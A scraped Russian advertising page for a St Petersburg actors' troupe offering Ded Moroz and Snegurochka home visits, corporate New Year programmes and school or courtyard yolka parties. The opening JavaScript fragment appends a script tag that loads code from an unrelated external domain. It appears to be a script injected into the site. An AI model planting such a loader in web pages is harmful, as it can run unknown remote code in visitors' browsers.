, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Дед Мороз и Снегурочка для детей

Дед Мороз и Снегурочка у вас дома — это самое невероятное чудо, о котором только может мечтать ребенок! Неужели это случилось, неужели Дед Мороз и правда есть, неужели письмо дошло, Дедушка пришел и исполнил заветное желание! Главное в этот момент всё не испортить, не разрушить детскую иллюзию, ведь так важно, чтобы ребенок, как можно дольше оставался ребенком. Повзрослеть никогда не поздно, а вот обратной дороги в детство уже нет…

Какие трудности и опасности подстерегают при выборе Деда Мороза:

Двери ваших парадных буквально пестрят различными объявлениями «Дедов Морозов» и так трудно решить, кого же выбрать… Конечно, нет точного рецепта, как по телефону отличить профессионального деда мороза от суррогатного, но помните, дешевле — не значит правильнее. Лучше один раз увидеть, чем семь раз услышать, не стоит верить всему, что вам рассказывают! Берите во внимание, что купить костюм Деда Мороза ныне не составляет труда. Сотни студентов всевозможных факультетов, зачастую не имеющих никакого отношения к театру или хотя бы просто к творчеству, скупают эти костюмы по 1000 рублей и идут себя продавать… за эти же деньги! Таким образом первый же «выезд» восполняет затраты, дальше только и делов — коси себе прибавку к стипендии, слушая стишки и даря подарки… работа не пыльная! Мы не в коем случае не хотим сказать, что все объявления от шарлатанов. Разумеется, нет, но где гарантии? По телефону можно рассказать, что угодно, но когда на пороге окажется непонятное существо в красном халате, с белой тканью вместо меха, ватной бородой, и плохой речью – деваться будет уже некуда!

Какие гарантии даем мы, и на чем стоит заострить внимание при выборе Деда Мороза:

  • Хорошая работа стоит несколько дороже: эксклюзивные костюмы, профессионализм, индивидуальный подход и душевные силы артистов сами по себе подразумевают большие затраты.
  • НАШИ Дед Мороз и Снегурочка не сидят в ожидании, чтобы наконец отдать подарок, пока ваш ребенок отдувается, танцуя и читая стихи. НАШИ артисты приносят Сказку в ваш дом и абсолютно самодостаточны. Даже если ваш ребенок совсем маленький и очень застенчивый – не сомневайтесь ПРАЗДНИК СОСТОИТСЯ!
  • Среди нас только профессиональные актеры, НАШИ лица и костюмы вы можете увидеть на этом сайте… и на фото в фойе петербургских театров, таких как Театр Сказки, БТК, театр «Бродячая собачка», Петербург-концерт, театр Музыкальной Комедии и др.
  • Мы дорожим своей репутацией, для НАС это не разовая сезонная подработка, а серьезная и постоянная деятельность, которая после Нового Года перетекает в Дни Рождения, выпускные, 1 сентября и т.д. Мы работаем так, чтобы встретиться с Вами еще не раз в течение года, быть желанными на каждом Вашем торжестве!
  • Мы не можем передумать, не захотеть и не приехать, опять же, потому что дорожим Вами и относимся серьезно к каждому заказчику. Кроме того. вы можете заключить с нами договор на оказание услуг, который придаст вам помимо человеческой еще и юридическую уверенность!
  • У НАС «СУХОЙ ЗАКОН», как бы вы не уговаривали нашего Деда Мороза «по одной» — бесполезно!
  • Несмотря на все перечисленные факторы, наши цены значительно ниже, чем у фирм-посредников, потому что мы – большой творческий коллектив, и работаем сами, никого не нанимая!

Дед Мороз и Снегурочка для взрослых

Дорогие друзья, Дед Мороз уже давно перестал быть атрибутом только детских праздников. Хорошей корпоративной традицией стало приглашение Деда Мороза в офис. Это отличная разрядка во время рабочего дня, когда позади почти целый трудовой год. Красив жест начальника, знающего, что сотрудники, которых иногда балуют, работают гораздо с большей отдачей! Неожиданное появление Деда Мороза и Снегурочки в офисе вызовет бурю позитивных эмоций. и сотрудники на полчаса словно окунутся в детство… Подарите себе праздник! Тем более, что в нашей компании цены для поздравления в офисе не отличаются от цен вызова Деда Мороза к ребенку!

Новогодний корпоратив

Корпоративный Новый год — всегда важное событие в жизни компании. Многие начинают готовиться к нему еще летом и правильно делают! Ведь как встретишь Новый год, так его и проведешь! Каждый год хочется всё более пышного и разнообразного праздника, и, конечно, чего-то новенького! Если в вашей фантазии есть еще какие-то не сбывшиеся праздничные мечты — мы с удовольствием поможем их реализовать. А если нет сил и времени даже фантазировать, мы готовы и это сделать за вас! Нам нравится расти и развиваться, несмотря на «увесистый арсенал» готовых программ:

  • Классический Новый год. Классические ведущие + Дед Мороз и Снегурочка
  • Новый год – Наоборот 1. А-ля зазеркалье, где время начинает идти в обратную сторону, и гости вовлекаются в увлекательное приключение по спасению Нового года, который становится всё дальше и дальше.
  • Новый год – наоборот 2. Ведут программу Девушка Мороз и Снегур, превратившиеся в таких персонажей как в фильме «любовь-морковь». Пока они не найдут средство превратится в Деда Мороза и Снегурочку, Новый год не наступит.
  • Гавайский новый год. Жаркая атмосфера, элементы костюмов для всех гостей и ощущение, что за окном не снег, а море и пальмы!
  • Новый год в стиле «Бременские Музыканты». Смешной костюмированный Новый Год.
  • Новый год в палате №6. Новый год с элементами фарса и клоунады. Для молодой компании, не боящейся нарушать правила и разрушать стереотипы.
  • Необычное путешествие в Новый год на Новогоднеробусе. Ведущие – пилоты , официантки – стюардессы, а вы — пассажиры, купившие билеты в Новый год. Но будьте готовы, путешествие будет полно турбулентных неожиданностей!
  • Новогодняя олимпиада. Пройдя через множество испытаний, надеемся вам удастся донести победный факел и передать эстафету Новому году.
  • Голубой огонек. Музыкальный Новый год, где вы сможете увидеть многих своих коллег в новом, неожиданном амплуа!

За более подробной информацией обращайтесь по телефону 955-99-51

Прайс-лист по корпоративному Новому году отсутствует, т.к. цена зависит от множества факторов. таких как день, место, продолжительность, количество гостей и ваши пожелания. Скажем только, что стоимость программы от 10000 рублей, не забывайте также, что неотъемлемой частью корпоративного праздника является ди-джей.

Ёлка в школе, детском саду

Поводов для проведения новогодней ёлки в канун Нового года искать не приходится. Это ёлка в детском саду или школе, ёлка на предприятии, где работают родители, ёлка во дворе дома и т.д… Наша компания обладает огромнейшим опытом проведения любых ёлок. в любых условиях. Дорогие взрослые, не упускайте возможность порадовать своих детей в канун новогодних праздников. Мы вам в этом с радостью поможем!

Елка в школе или детском саду должна быть! И это уже даже не обсуждается. Стоит только решить какая: классическая и уютная в классе. группе или шумная и яркая в актовом зале, с большим количеством персонажей и для всей школы….

Елка на предприятии – это грамотный ход со стороны руководителя коллектива, выражающего заботу о своих сотрудниках. Организовывая такую елку, вы не только радуете детей, но и укрепляете внутрикорпоративные связи, что, безусловно, положительно влияет на ваш статус и статус предприятия в целом!

Елка во дворе вашего дома – так полезно знать своих соседей, тем более. что ваши дети, гуляя во дворе, уже давно дружат. Последнее время елки, организуемые ТСЖ, вошли в моду. Каждый председатель, как грамотный и дальновидный домоправитель, считает своим долгом сделать такой новогодний подарок своим избирателям. Есть и еще одно преимущество таких праздников от нашей компании: многие из вас привыкли не только посещать елки, но и приглашать Деда Мороза домой, дабы дедушка удилил персональное внимание вашему чаду и привел незабываемую Сказку прямо к вам в домой… Мы готовы в день праздника в ТСЖ сделать 50% скидку на домашний вызов Деда Мороза и Снегурочки с программой и 40% скидку на блиц-поздравление! Если в вашем доме нет ТСЖ, или по каким-то причинам оно вам не устраивает праздник – самое время активизироваться родителям. Ведь праздник во дворе, где будет большое количество детей, никак не ударит по вашему бюджету: цена не зависит от количества присутствующих, а возможность пригласить Дедушку Мороза за полцены домой у вас останется! Таким образом 40-минутная программа дома и елка во дворе вам обойдется гораздо дешевле, чем просто заказ Деда Мороза домой! Тем более, что на качестве это никак не отразится! Мы вырастили уже не одно поколение детей, и, обратившись к нам однажды, наши координаты уже не теряют, особенно те, кому было с чем сравнить!


Снежная феерия

Невероятно эффектное дополнение к корпоративному Новому году. 100% погружение на 20-30 минут в беззаботное детство! Море бумажного снега, энергичная музыка. и вы сами не заметите как окажетесь в центре событий! Ни строгий начальник, ни бухгалтер, ни коммерческий директор не останутся в стороне. Сумасшедшие завораживающие снежки покорят всех – это факт, проверенный на деле уже не раз!


Снежное шоу